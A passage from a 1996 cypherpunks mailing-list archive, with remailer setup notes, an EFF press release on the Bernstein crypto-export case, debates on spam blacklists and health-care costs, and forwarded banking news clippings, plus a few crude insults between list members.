8) Edit KEY.ASC to insert your remailer's PGP public key.
9) Edit SOURCE.BLK (source address blocking file) and DEST.BLK (destination address blocking file) for any addresses you want to block. I recommend you block "whitehouse.gov" to make sure no one uses your remailer to threaten the President, which is a federal crime. Each address must go on a separate line.
10) Create a "Program Item" that you will use to startup the remailer from the Windows Program Manager. Do this by selecting the Group that you want to put the WinSock Remailer into and then selecting File | New from the Program Manager. Make sure that the Working Directory points to the directory where REMAILER.EXE resides.
11) Once you have done all of the above instructions, you can now run the remailer for the first time. Open all of the dialog boxes under the Setup Menu and fill out all of the items. See the WinSock Remailer Setup Page at http://www.c2.net/~winsock/setup.html for more details.
12) Once everything is setup properly, you can now run the remailer. Use Private Idaho to send the remailer some test messages and verify that the operation of the remailer is successful. You will probably want to turn on logging so that you can debug any problems with your remailer setup.

If you have any problems or questions, send me a note at jgrasty at gate.net and I will get back to you as soon as I can. You can find additional information on my webpage at http://www.c2.net/~winsock/. See also the release notes at http://www.c2.net/~winsock/relnote.html.
Since this is alpha software, you may encounter some problems. Specifically, I need to know if you have success with any of the following untested configurations:

a) Windows 95 (now known not to work)
b) Windows NT (now known not to work)
c) Any WinSock other than Internet-In-A-Box or Trumpet WinSock.
d) Any version of PGP other than 2.6.2.

If you do find a problem, give me detailed information on your computer's configuration, such as version of Windows, Winsock, amount of memory, which version of PGP, etc.

Good luck,

Joey Grasty
jgrasty at gate.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMkCJNsODO2V89BZZAQGpSgL/bfB+K6kZsguHIWlmOdzkQiU/sJHYYFZN
XMwyvt+CXyuQX3nCIwHEkWglFIly+9+FUHfD49McTuBAx0E/EyfuiQbS4XkiSsym
6r/B4kBv3w9Tv54p19LnsApSH4YjGHMX
=4XOe
-----END PGP SIGNATURE-----

--
Joey Grasty
jgrasty at gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty at pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is, of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13 93 F4 C9 06 89 51 F5 A7

From alexlh at yourchoice.nl Wed Sep 18 20:04:45 1996
From: alexlh at yourchoice.nl (Alex Le Heux)
Date: Thu, 19 Sep 1996 11:04:45 +0800
Subject: Spam blacklist project
In-Reply-To: <9609182121.AA13495@vesuvius.ai.mit.edu>
Message-ID:

On Wed, 18 Sep 1996 hallam at vesuvius.ai.mit.edu wrote:

>
> Not impressed by their setup, there does not seem to be any checking
> to see if the mail address is correct (ie to check for a denial of
> service attack) and the setup requires distributors to submit their
> list for "washing". That type of setup may be OK for the bush league
> but it's hardly cypherpunk type stuff. It's fairly easy to set up a scheme
> in which the blacklist can be distributed with no risk to the
> subscribers. Simply use SHA digests and so on.
>

I didn't say their setup was the setup to end all spams :) But I never really gave it much thought.
It shouldn't be too complicated to set some up like you describe though.

> I hadn't checked on Yahoo, I tend to use Alta-Vista having found
> Yahoo somewhat arbitrary in category definition.
>

I usually check on Yahoo first. Alta-Vista always comes back with such an enormous amount of links.

>
> PS Sites that use red text on a white background ... ugh!!!
>

Ah well... Some people never learn :(

Cheers,

Alex

/// I dabble in techno-house and sometimes,
/// I do that badass hip-hop thang...
/// But the F U N K gets me every time!

From dlv at bwalk.dm.com Wed Sep 18 20:10:48 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Sep 1996 11:10:48 +0800
Subject: 56 kbps modems
In-Reply-To: <199609181248.IAA06860@sherry.ny.ubs.com>
Message-ID:

pjb at ny.ubs.com writes:

> if nothing else, the availability of 56kbps on an analog line might get the
> telcos to bring the isdn prices down to some reasonable level, which at the m
> it is not, at least not in nyc.

In NYC one has to pay 1c/minute/channel for using ISDN, even for a local call, which comes out to $1.20/minute for the 2 channels most people have. It's worse than most Western states, with no per minute charges. It's better than Connecticut, where it costs $6/hour.
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From gnu at toad.com Wed Sep 18 20:11:20 1996 From: gnu at toad.com (John Gilmore) Date: Thu, 19 Sep 1996 11:11:20 +0800 Subject: Bernstein hearing: The Press Release Message-ID: <199609182103.OAA22863@toad.com> CRYPTO FACE-OFF AT HIGH-NOON Judge Patel to Decide if Government Restrictions on Cryptography Violate the First Amendment September 18, 1996 Electronic Frontier Foundation Contacts: Shari Steele, Staff Counsel 301/375-8856, ssteele at eff.org John Gilmore, Founding Board Member 415/221-6524, gnu at toad.com Cindy Cohn, McGlashan & Sarrail 415/341-2585, cindy at mcglashan.com San Francisco, CA -- On Friday, September 20, 1996, Judge Marilyn Hall Patel will hold hearings in a case with far-reaching implications for personal privacy, U.S. competitiveness, and national security. Mathematician Daniel J. Bernstein, a Research Assistant Professor in the Department of Mathematics, Statistics and Computer Science at the University of Illinois at Chicago, has sued several Federal agencies on the grounds that the agencies' requirement that he obtain a license prior to publishing his ideas about cryptography violates his First Amendment right to freedom of speech. Cryptography is the science of secret writing. It is the technology to use for providing privacy or proving authenticity over distances. All kinds of communications, from cellular phones to corporate or government databases, depend on cryptography for protection. The security of computers against intruders, the privacy and integrity of the Internet, ATM machines, satellite and cable TV, and the world financial networks all depend on cryptographic protection. In fact, the very future of the global Internet, especially as a tool for commerce, political organizing and scientific development of new ideas, depends upon the availability of strong encryption. The U.S. 
government has restricted cryptography since it was useful in winning World War II. However, cellular telephones, satellites, ATM machines, and the Internet did not exist in 1945; advances in communication and cheap computation have made cryptography useful in many new applications. In addition, strong encryption is already available abroad, making laws restricting their export obsolete and damaging the ability of U.S. businesses to compete in overseas markets. In fact, Congress is currently considering three pieces of legislation that would all update the export control laws and remove encryption from its current place on the U.S. Munitions List. While Washington toils with Pro-CODE and the other introduced bills, this hearing will examine the various legal tests that will determine whether the export laws and regulations (the "ITAR") are constitutional. Professor Bernstein argues that they violate the First Amendment in several different ways: LEGAL ARGUMENTS * Any legal framework that allows a government bureaucrat to censor speech before it happens is an unconstitutional prior restraint. The government is not allowed to set up such a drastic scheme unless they can prove that publication of such information will "surely result in direct, immediate, and irreparable damage to our Nation or its people" and that the regulation at issue is necessary to prevent this damage. The government must also tightly restrain the discretion given to the bureaucrats to ensure that they don't misuse this power. The government has not met this burden regarding the ITAR legal framework. * Because restrictions on speech about cryptography are based on the content of what is being said, the court must apply a strict scrutiny test to determine whether individuals can be punished for engaging in this speech. This requires that the regulation be necessary to serve a compelling state interest and that it is narrowly drawn to achieve that end. 
The ITAR regulatory scheme has adopted a too-restrictive approach, by prohibiting many forms of speech in the area of cryptography.

* The ITAR regulatory framework lacks the necessary procedural safeguards. Grants of administrative discretion must be limited by clear standards, and judicial review must be available. "Quite simply, the ITAR Scheme allows its administrative agencies to make inconsistent, incorrect and sometimes incomprehensible decisions censoring speech, all without the protections of judicial review or oversight."

* The ITAR framework is unconstitutionally vague. The government doesn't even seem to know what its regulations include and exclude! Here, they told Professor Bernstein that he could not publish his academic paper for over three years, only changing their collective mind and withdrawing that decision after being sued. The lack of standards has allowed the government to misuse a statute aimed at commercial, military arms sales to limit academic and scientific publication.

* The ITAR regulatory scheme is overbroad. In an internal memo written almost 20 years ago, the government's own Office of Legal Counsel concluded that the ITAR's licensing standards "are not sufficiently precise to guard against arbitrary and inconsistent administrative action." The OLC specifically warned that the coverage was so broad it could apply to "communication of unclassified information by a technical lecturer at a university or to the conversation of a United States engineer who meets with foreign friends at home to discuss matters of theoretical interest." This is exactly what is happening here, and it is unconstitutional.

Judge Patel will hear arguments from attorneys for Bernstein and the government concerning their respective motions for summary judgment. The hearing on Friday is scheduled for 12:00 noon at the United States District Court for the Northern District of California, San Francisco Headquarters, at 450 Golden Gate Avenue.
The hearing is open to the press and to the public. CASE BACKGROUND Bernstein completed the development of an "encryption algorithm" (a recipe or set of instructions) he calls "Snuffle." In order to contribute Snuffle to the marketplace of scientific ideas, and to allow other scientists to evaluate and test his ideas, Bernstein wishes to publish (a) a paper in English describing and explaining the algorithm, (b) the "source code" for a computer program that uses the algorithm (this source code more precisely describes and implements the idea), and (c) instructions for how a person could use the source code and a computer to encrypt communications. He wishes to publish them in print journals as well as on the Internet. Bernstein also wishes to discuss these items at mathematical conferences, in college classrooms, on the Internet, and in other open, public meetings. In fact, he would like to use Snuffle as part of his course material for a cryptography class he will be teaching next spring. The Arms Export Control Act and the International Traffic in Arms Regulations (the ITAR regulatory scheme) required Bernstein to submit his ideas about cryptography to the government for review, to register as an arms dealer, and to apply for and obtain from the government a license to publish his ideas. Failure to do so would result in severe civil and criminal penalties. Bernstein believes this is a violation of his First Amendment rights and has sued the government. In the first phase of this litigation, the government argued that since Bernstein's ideas were expressed, in part, in computer language (source code), they were not protected by the First Amendment. On April 15, 1996, Judge Patel rejected that argument and held for the first time that computer source code is protected speech for purposes of the First Amendment. 
Because of its far-reaching implications, the Bernstein case is being watched closely by privacy advocates, the computer industry, the export and cryptography communities, and First Amendment activists. In fact, several members of these communities provided declarations that were submitted in support of Bernstein's motion. ABOUT THE ATTORNEYS Lead counsel on the case is Cindy Cohn of the San Mateo law firm of McGlashan & Sarrail, who is offering her services pro bono. Major additional pro bono legal assistance is being provided by Lee Tien of Berkeley; M. Edward Ross of the San Francisco law firm of Steefel, Levitt & Weiss; James Wheaton and Elizabeth Pritzker of the First Amendment Project in Oakland; and Robert Corn-Revere of the Washington, DC, law firm of Hogan & Hartson. ABOUT THE ELECTRONIC FRONTIER FOUNDATION The Electronic Frontier Foundation (EFF) is a non-profit civil liberties organization working in the public interest to protect privacy, free expression, and access to online resources and information. EFF is a primary sponsor of the Bernstein case. EFF helped to find Bernstein pro bono counsel, is a member of the Bernstein legal team, and helped collect members of the academic community and computer industry to support this case. Full text of the lawsuit and other paperwork filed in the case is available from EFF's online archives at http://www.eff.org/pub/EFF/Policy/Crypto/ITAR_export/Bernstein_case/ From seans at pobox.com Wed Sep 18 20:18:12 1996 From: seans at pobox.com (Sean Sutherland) Date: Thu, 19 Sep 1996 11:18:12 +0800 Subject: Snake-Oil FAQ Message-ID: <19960918235435406.AAB287@maverick> -----BEGIN PGP SIGNED MESSAGE----- To: wendigo at pobox.com, cypherpunks at toad.com Date: Wed Sep 18 18:54:08 1996 > I think a blacklist of that sort is inherently bad. I would much rather > have the public be able to RECOGNIZE SYMPTOMS of snake oil, rather than > just be spoon fed a list of good products vs. bad products. 
Pardon the
> cliche, but if you give a man a fish ... etc, etc.

Not only that, but you're also looking at a potential lawsuit, unless such a list were compiled and managed through the use of a nymserver. Since there's no way, within reasonable limits, that a cryptographic program can be proven bad, then a lawsuit is inevitable. I could potentially see a list of products which have "methods which have been proven ineffective in securing data against determined attacks" such as DES, etc., but otherwise, it's just begging for trouble.

- ---
Sean Sutherland         | GCS/C d- s+:+ a--- C+++ V--- P L E- W++ N++ K- w
PGP Key ID: E43E6489    | o O-(++) M-- V PS+ PE++ Y++ PGP++(+) t--- 5+++
http://pobox.com/~seans | X++ Rb++ DI+ D+ G e- h! !r y

From dlv at bwalk.dm.com Wed Sep 18 20:18:20 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Sep 1996 11:18:20 +0800
Subject: Fuckhead
In-Reply-To: <199609181408.AA21359@crl11.crl.com>
Message-ID:

>From varange at crl.com Wed Sep 18 10:09:35 1996
Received: by bwalk.dm.com (1.65/waf) via UUCP; Wed, 18 Sep 96 11:07:01 EDT for dlv
Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA17484 for dlv at bwalk.dm.com; Wed, 18 Sep 96 10:09:35 -0400
Received: from crl11.crl.com by mail.crl.com with SMTP id AA03230 (5.65c/IDA-1.5 for ); Wed, 18 Sep 1996 07:10:02 -0700
Received: by crl11.crl.com id AA21359 (5.65c/IDA-1.5 for dlv at bwalk.dm.com); Wed, 18 Sep 1996 07:08:08 -0700
From: Troy Varange
Message-Id: <199609181408.AA21359 at crl11.crl.com>
Subject: Fuckhead To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 07:08:08 -0700 (PDT) Priority: Fuckhead Precedence: Fuckhead Reply-To: dlv at bwalk.dm.com In-Reply-To: X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 10 Fuckhead. From frissell at panix.com Wed Sep 18 20:23:18 1996 From: frissell at panix.com (Duncan Frissell) Date: Thu, 19 Sep 1996 11:23:18 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Political. Message-ID: <3.0b19.32.19960918165617.00a19168@panix.com> At 03:44 PM 9/18/96 EST, jbugden at smtplink.alis.ca wrote: >I did not respond to the other poster because it seemed clear that he was not >informed on the subject. While people debate the precise reasons for it, the >Canadian health system spends about two thirds as much as the U.S. system as a >percent of GNP while covering more people as a percent of population. This is a >fact. Canada has the world's second most expensive system (after ours) and I think is a bit closer to 80% of our per cap expenditures. Canada's costs and ours used to track pretty well. When Canada adopted the Provincial Health Systems model in the mid '60s they fell 20% (relative to us -- while our costs were exploding because of Medicare-Medicaid). Since then, Canadian costs have risen at approx the same rate as ours. Per cap expenditures on the uninsured in America are approximately the same as on the insured. As are average number of days in hospital, etc. Most of the uninsured just go to hospitals and don't pay. States have various methods of sharing this cost out. Interestingly, even though government expenditures here are 60% of the total, per cap government expenditures on health care are higher here than in the UK under the Nattie Health. Our system is much more expensive than it has to be because the unrestricted insurance model encourages over consumption. 
Americans are very assertive about getting what's coming to them. They don't like to wait. They can only be restrained by market pricing.

>This is another way to create risk pool separation as well as reduce health
>costs. Some people will not be able to afford tobacco, reducing the potential
>candidates for tobacco related illness. The additional revenue can be used as a
>"risk premium" to fund the related long term medical expenses.

Course Canada lost it when smuggling defeated the high tax levels on cigarettes. This will be more of a problem in the future as more efficient markets enable more smuggling.

>If all you do is replace Big Brother with Big Business, then all that has
>changed is the name.

GM shoots fewer people than the US Gov. And if they started shooting more people, their cash flow would suffer. People are willing to accept less violence from private institutions, however large, than from governments. In addition, average institutional size is down. Big business is smaller.

DCF

From jbugden at smtplink.alis.ca Wed Sep 18 20:24:49 1996
From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca)
Date: Thu, 19 Sep 1996 11:24:49 +0800
Subject: Risk v. Charity (was: RE: Workers Paradise. /Politica.
Message-ID: <9608188430.AA843086679@smtplink.alis.ca>

>Black Unicorn wrote:
>> jbugden at alis.com wrote:
>> But I did cite one example of a government
>> funded system that *is* less expensive than a market driven one.
>
>I believe this cite was refuted by another poster, that is if you mean the
>Canadian health system.

I did not respond to the other poster because it seemed clear that he was not informed on the subject. While people debate the precise reasons for it, the Canadian health system spends about two thirds as much as the U.S. system as a percent of GNP while covering more people as a percent of population. This is a fact.

>> >> Not every victim of lung cancer smokes.
>> >I'll tell you what.
I will give you a dollar for every non-smoking
>> >related lung cancer case, if you give me one for every smoking
>> >related case.
>>
>> Agreed, with one condition. I get to create a tax on tobacco products
>> and keep this additional revenue.
>
>Uh, what's your point here?

This is another way to create risk pool separation as well as reduce health costs. Some people will not be able to afford tobacco, reducing the potential candidates for tobacco related illness. The additional revenue can be used as a "risk premium" to fund the related long term medical expenses.

>Markets, however, fail far less often than the left would have us believe.
>They also have the rather potent effect of reducing government
>involvement in everyday life.

I don't speak for the left, nor for the right. I don't think that there is a unified voice on either side of the political spectrum. However I do find it ironic that market driven health insurance has the potential to be more intrusive into personal life than many government systems (cf. genetic screening). If all you do is replace Big Brother with Big Business, then all that has changed is the name.

Ciao,
James

"what are cast as one-sided ... guidelines can be recast beneficially as two-sided trade-offs" - Webb Stacy

From paul at fatmans.demon.co.uk Wed Sep 18 20:37:57 1996
From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk)
Date: Thu, 19 Sep 1996 11:37:57 +0800
Subject: IBM_gak
Message-ID: <842988791.23099.0@fatmans.demon.co.uk>

> Apparently, senile Tim May (fart) is a Clinton administration troll planted
> here to sabotage any discussions of actual crypto work and to flood this
> mailing list with lies and personal attacks and to make it unusable.

You would appear to be an accomplice....
Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Http://www.fatmans.demon.co.uk/crypt/
"Don`t forget to mount a scratch monkey"

From dlv at bwalk.dm.com Wed Sep 18 20:38:21 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Sep 1996 11:38:21 +0800
Subject: [NEWS] Crypto-relevant wire clippings
In-Reply-To: <199609181401.AA21244@crl11.crl.com>
Message-ID: <5gLguD3w165w@bwalk.dm.com>

>From varange at crl.com Wed Sep 18 10:09:46 1996
Received: by bwalk.dm.com (1.65/waf) via UUCP; Wed, 18 Sep 96 11:07:02 EDT for dlv
Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA17510 for dlv at bwalk.dm.com; Wed, 18 Sep 96 10:09:46 -0400
Received: from crl11.crl.com by mail.crl.com with SMTP id AA03347 (5.65c/IDA-1.5 for ); Wed, 18 Sep 1996 07:10:14 -0700
Received: by crl11.crl.com id AA21244 (5.65c/IDA-1.5 for dlv at bwalk.dm.com); Wed, 18 Sep 1996 07:01:51 -0700
From: Troy Varange
Message-Id: <199609181401.AA21244 at crl11.crl.com>
Subject: Re: [NEWS] Crypto-relevant wire clippings
To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 07:01:50 -0700 (PDT)
In-Reply-To: <3kJFuD96w165w at bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 17, 96 10:32:37 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 19290

>
> Money Laundering Alert: August 1996
>
> 'Unauthorized' Banks Pose Laundering Threat
>
> They are subject to none of the recordkeeping or reporting requirements
> of the Bank Secrecy Act, receive no examinations from any banking
> regulator, and may be on your bank's currency transaction reporting
> exemption list.
>
> The Office of the Comptroller of the Currency refers to them as
> "entities that may be conducting banking operations in the U.S. without
> a license." Money launderers probably refer to them as dreams come true
> and, unless legitimate financial institutions are alert, can use them to
> place illicit proceeds into the financial system.
>
> They are "unauthorized" banks, and for the past five years the OCC has
> been disseminating advisories to legitimate U.S. banks - but not to
> consumers - in an effort to expose their existence and halt their
> illegal operations.
>
> These so-called "banks" offer a variety of banking services, often at
> lower fees and better interest rates than legitimate banks offer. What
> makes them different from a legitimate bank - and attractive to money
> launderers -- is that they are not licensed by any U.S. banking agency
> and thus do not have to meet regulatory standards.
>
> Because the OCC and other federal bank regulators are not investigative
> agencies, they can do little more than report these institutions to
> those who are. If the entities are found to be operating a bank without
> a license they can be prosecuted under the Glass-Steagall Act (Title 12,
> USC Sec. 378(a)(2)).
>
> Such prosecutions are rare.
In one case in 1994, initiated by Federal > Reserve Board examiners, the principals of Lombard Bank, Ltd., were > charged with operating an unauthorized bank through a payable-through > account at American Express Bank International in Miami. Lombard, which > had been "licensed" in the South Pacific money laundering haven of > Vanuatu, offered its Central American customers virtually full banking > services in the U.S. through its PTA (MLA, Sep. 1994). > > Earlier this year, the OCC released a list of more than 50 "banks" known > to be operating without authorization. OCC officials say the number > grows steadily. Some of the "banks" say they are licensed by foreign > countries or U.S. states to conduct banking business. Others, such as > the Swiss Trade & Commerce Trust, Ltd., of Belize, continue to offer > services in the U.S. despite edicts from foreign banking authorities to > cease doing business. > > The unauthorized entities have a common trait. They usually have names > that are similar to those of well-known legitimate institutions. The OCC > list includes the Bank of England, a Washington, D.C., entity not > associated with London's famous "old lady on Threadneedle Street" and > Citicorp Financial Services, a Beverly Hills firm not associated with > the better-known institution of that name. It also includes the First > Bank of Internet, which heralds itself as the first bank in cyberspace. > > Through its periodic "special alerts," the OCC warns banks to "view with > extreme caution any proposed transaction involving any of the listed > entities." It makes no effort to educate members of the general public > who unknowingly place their money and trust in those uninsured > institutions. 
> > > > > American Banker: Friday, August 30, 1996 > > Swift Near Alliance in Trade Document Automation > > By STEVEN MARJANOVIC > > Swift, the international banking telecommunications network, wants to > play a bigger role in trade finance and the exchange of related > documentation. > > Sources said the Brussels-based organization will soon take a position-- > perhaps as early as its September board meeting-- on whether to work on > trade automation in cooperation with another consortium, called Bolero. > > Such a move would involve an increase in nonbank participants on a > bank-owned network that has approached such liberalization cautiously. > > Swift, formally the Society for Worldwide Interbank Financial > Telecommunication, is used by 5,300 banks for exchanging messages in > such areas as funds transfer, foreign exchange, and securities. > > The network averaged about 2.7 million messages a day in July, > representing daily dollar volumes exceeding $2 trillion. > > Officials said Swift is nearing a decision to work with the Bolero > Association, which is forming an electronic registry for the so-called > "dematerializing" of trade documents. Swift could provide the "platform" > for allowing banks and corporations to exchange such documentation as > letters of credit and bills of lading. > > Bolero was formed in 1994 with funding from the European Commission, but > has not formulated concrete operating plans. Its members include > Citicorp, Barclays Bank PLC, and other multinational banks and > corporations. > > Peter Scott, trade services market director at Swift, said it has been > in discussions with London-based Bolero since December 1995 about > joining forces to automate the exchange of trade documents. > > "Bankers are beginning to sense both the opportunities in those areas > and the threats to them from an intermediary stepping in and potentially > taking away the business," Mr. Scott said. 
> > Trade-document capability "is not a heavily utilized area within Swift > at the present time," he said. > > The potential in automation is obvious to Bolero officials. At the New > York Banktrade Conference recently, John McKessy, the association's > North American representative, said the annual value of goods moved > internationally approaches $4 trillion. > > He estimated current international trade requires some three billion > documents to be issued and managed. > > The cost of dealing with paper alone eats up about 7% of the total value > of those goods, as much as $280 billion, Mr. McKessy said. > > Bank revenues from issuing letters of credit last year were just over $1 > billion, according to a soon-to-be-released survey by the U.S. Council > on International Banking. > > Anthony K. Brown, senior vice president of trade services at MTB Bank, > described trade transaction processing as "extremely cumbersome and > tedious, prone to mistakes and delays (that) can be a hindrance to the > completion of a transaction." > > MTB is a $400 million-asset merchant bank based in New York. About 80% > of its $100 million in loans are trade-related. > > The paper-shuffling costs are not borne entirely by banks. Import/export > companies, insurers, freight forwarders, and various government > inspection agencies are also involved. > > "The question is whether Swift wants to do it," said Dan Taylor, > president of the New York-based U.S. Council. > > "Swift is going to act fairly quickly on this," he added. > > Mr. Taylor said Swift officials will likely grapple once again with the > political and philosophical issues of giving nonbanks more access to > Swift, and to payment systems generally. > > In 1995, the network granted partial access to nonbanks after years of > heated debate. > > "You always have this push and pull, where some banks would like Swift > to do certain things" while others want the network to focus on the > money transfer business, Mr. 
Taylor said. > > "If Bolero succeeds and Swift joins, I think it will move fairly > rapidly, but I'm not sure that Bolero is going to be the only thing out > there." > > He said Bolero might evolve using value-added networks - or intranets - > like the IBM Global Network and General Electric Information Services > Co., or perhaps even the Internet. > > Indeed, another member of Bolero, CSI Complex Systems Inc., New York, is > apparently talking to several providers of private, value-added networks > and may soon enter a contract with one. > > CSI letter-of-credit software leads the pack in banking, with about a > 16% market share, Mr. Taylor said. > > The company recently formed a business unit called Electronic Documents > International, which has developed an Internet-based system for > initiating letters of credit. CSI spokesman George Capsis said the > software, Import.com, creates "about 30 key documents involved in > international trade." > > The Internet, enhanced with security features, may help the trade > industry reduce paper-related costs, especially at smaller companies > overseas. > > CSI managing director Andre Cardinale said customers need only to "dial > into a bank's Internet server, pull up the Import.com application, and > actually fill in the details to create a new letter of credit or an > amendment to an existing one." > > While Bolero may find a place on the Internet or a GE-type network, Mr. > Cardinale said the ultimate push may yet come from the banking industry > working collectively through Swift. > > He said Swift opposition from nonbank constituencies that are concerned > the telecommunications cooperative will be more sympathetic to banks > when disputes arise. > > But "if Swift does it," he added, "it will bring banks into the universe > far more - pardon the pun - swiftly." 
> > > Crain's New York Business: August 26, 1996 > > Bloomberg to Detail Growth of Information Empire > > Michael Bloomberg made a name for himself on Wall Street with his > trading acumen and mastery of the computer systems that were becoming > crucial to success in the securities business. > > But no one suspected when he left Salomon Brothers in 1981 that in the > next decade he would build the fastest-growing provider of financial > information in the world. > > Mr. Bloomberg, whose company Bloomberg Financial Markets has estimated > sales of $600 million, will be the keynote speaker at the fifth annual > Crain's ''Growing a Business Expo,'' to be held this year on Thursday, > Oct. 24. > > The event will take place at the New York Hilton & Towers from 8 a.m. to > 1 p.m. It is presented by Citibank and co-sponsored by Con Edison and > Empire Blue Cross and Blue Shield. > > Last year, more than 1,000 growing business owners and managers attended > the expo, which provides information for companies operating in the city > regarding potential suppliers, financial resources and government > programs. > > The cost to attend the event is $45 and includes a continental > breakfast. Individuals registering before Sept. 6 can bring a colleague > for free. To register, call Flagg Management at (212) 286-0333. > > In addition to Mr. Bloomberg's speech, attendees will be able to attend > seminars on financing and other help available from the city, financing > techniques, energy cost savings programs and how to reduce health > insurance costs. An expected 135 exhibitors will be offering products > and services of use to growing companies. > > Crain's New York Business editors will discuss how a growing business > can get coverage in Crain's and in other publications. > > The heart of Mr. Bloomberg's empire is a news gathering operation that > sends information through 62,000 computer terminals installed on the > desks of investment professionals around the nation. 
His company > provides the latest financial news and sophisticated tools to analyze > information. > > The company he has built is noted for its lack of bureaucracy despite > its growth to 2,000 employees. Its hallmarks are hands-on leadership and > an entrepreneurial atmosphere where employees receive perks such as free > food. > > Mr. Bloomberg has extended his reach to include an all-news radio > station in New York, WBBR; Bloomberg Personal TV; syndicated television > shows; a monthly personal finance magazine; and a similar magazine for > institutional investors. > > > American Banker: Friday, September 6, 1996 > > America Online Opens a New Banking Channel > > By DREW CLARK > > Nineteen banks - national home banking stalwarts such as Citicorp and > BankAmerica, plus a complement of less prominent regionals - have > climbed onto the America Online bandwagon. > > Most already offer their customers several options for banking via > personal computer and view America Online, with its six million > subscribers, as a way to appeal to a broad cross-section of computer- > literate consumers. > > Fourteen of the AOL banking partners will be delivering services through > BankNow, a software package developed for the interactive network by > Intuit Inc. > > The other five banks have opted to use their own software. One of them - > Security First Network Bank, which operates entirely on the Internet - > will invite AOL users in through their Web browsers. > > With its announcement this week, America Online Inc. takes its place > among the many alternative "channels" for on-line banking. > > Many of the banks on AOL's list are simultaneously cooperating with > other companies that are themselves competitors, such as Intuit and > Microsoft Corp., suppliers of the Quicken and Money financial management > software, respectively. 
> > Also crossing competitive lines, America Online said its subscribers > will be able to bank from home with PC software from three suppliers > other than Intuit: Checkfree Corp., Online Resources and Communications > Corp., and Visa Interactive. > > "Everyone understands that there is competition in the home banking > arena," said David Baird, general manager of the personal finance > division at America Online, based in Dulles, Va. "To align ourselves > with exclusively one company would be a mistake." > > Intuit can count on 14 initial bank users of BankNow. Spokesmen for the > other three system vendors declined to say when they expect to have home > banking products available for the AOL channel. > > Experts noted that AOL and Intuit could be a strong tandem, in that they > dominate their respective businesses. > > Intuit's Quicken is the leading brand in personal finance software. The > company claims more than 9 million active users and a market share of > about 80%. > > America Online's subscriber base of six million is as big as those of > its next two competitors, Compuserve and Prodigy, combined. > > The financial institutions currently offering BankNow are: American > Express, Bank of Stockton (Calif.), Centura Banks Inc., Commerce Bank of > Kansas City, Mo., Commercial Federal of Omaha, Compass Bank of Alabama, > CoreStates Financial Corp., Crestar Financial Corp., First Chicago NBD > Corp., Laredo (Tex.) National Bank, M&T Bank of Western New York, > Marquette Bank of Minneapolis, Sanwa Bank California, and Union Bank of > California. > > More plan to offer BankNow-based services through AOL later this year: > BankAtlantic of Florida, Bank of Boston, First Hawaiian Bank, First > Michigan Bank, Mellon Bank, Signet Bank, and U.S. Bank of Oregon. > > Unlike Quicken, BankNow software is available free to America Online > subscribers. > > Banks' fees will vary. 
First National Bank of Chicago said it will > charge $3.95 a month for on-line banking and $9.95 a month for other > services that include bill payment. > > Centura Banks Inc. said it will offer on-line banking free, and charge > $5.95 a month for bill payment. > > Intuit officials declined to disclose what its Intuit Services Corp. > processing unit will charge to handle these transactions for banks. > > Some of Intuit's larger bank partners chose not to offer BankNow because > they already promote their own PC banking programs. > > For example, Citicorp, First Union, and Wells Fargo each support > Quicken, but passed on BankNow. Instead, they are paying a premium for a > "button" on America Online's banking screen that will eventually link > users to a proprietary home banking program. > > > > AP Online: Thursday, September 5, 1996 > > House Probes Money Laundering > > By ROB WELLS > > House Banking Committee members on Thursday urged a Treasury Department > agency to step up its efforts to halt money laundering by Mexican drug > lords. > > Rep. Spencer Bachus, R-Ala., urged the Financial Crimes Enforcement > Network to put in place new regulations to plug a significant loophole > that allows Mexico's drug dealers to place their ill-gotten profits back > into the U.S. > > Bachus, chairman of the House Banking oversight subcommittee, said > Congress gave authority to FinCen in 1994 to put in place new rules that > would prevent drug dealers from using foreign bank drafts, a type of > check, to evade currency reporting restrictions. > > ''That effort is long, long overdue,'' Bachus said. > > Rep. Henry Gonzalez, D-Texas, asked the agency to provide further > details about suspected money laundering in his home town of San > Antonio, particularly the source of a $3 billion cash surplus in the San > Antonio Federal Reserve Bank. 
> > The issue arose as Bachus' panel began exploring the dramatic rise of > narcotics traffic along the 2,000 mile long U.S.-Mexico border, and the > ease with which drug dealers can ship their profits to the south. Money > laundering refers to the practice by which drug dealers, mobsters and > others funnel their illegal profits into the banking system through > businesses or other means. > > Bachus said estimates of drug profits laundered through Mexico range > from $6 billion to $30 billion per year. Stanley E. Morris, FinCen's > director, defended his agency's record, saying a combination of new > rules and tougher enforcement in the past decade has ''made it more > difficult to launder money in the U.S.'' and increased the costs of > money laundering. Morris' agency enforces the Bank Secrecy Act, a key > weapon against money laundering. > > As for the new rules aimed at foreign bank drafts, Morris said the > regulations are more difficult than first expected because such > restrictions also could hinder legitimate commerce. He said the proposal > would be released soon. > > FinCen is working on other fronts to combat money laundering, which > includes a new computer system that tallies bank fraud to help > regulators gain an early warning of money laundering. > > In addition, the Clinton Administration assisted Mexico in adopting new > anti-money laundering rules earlier this 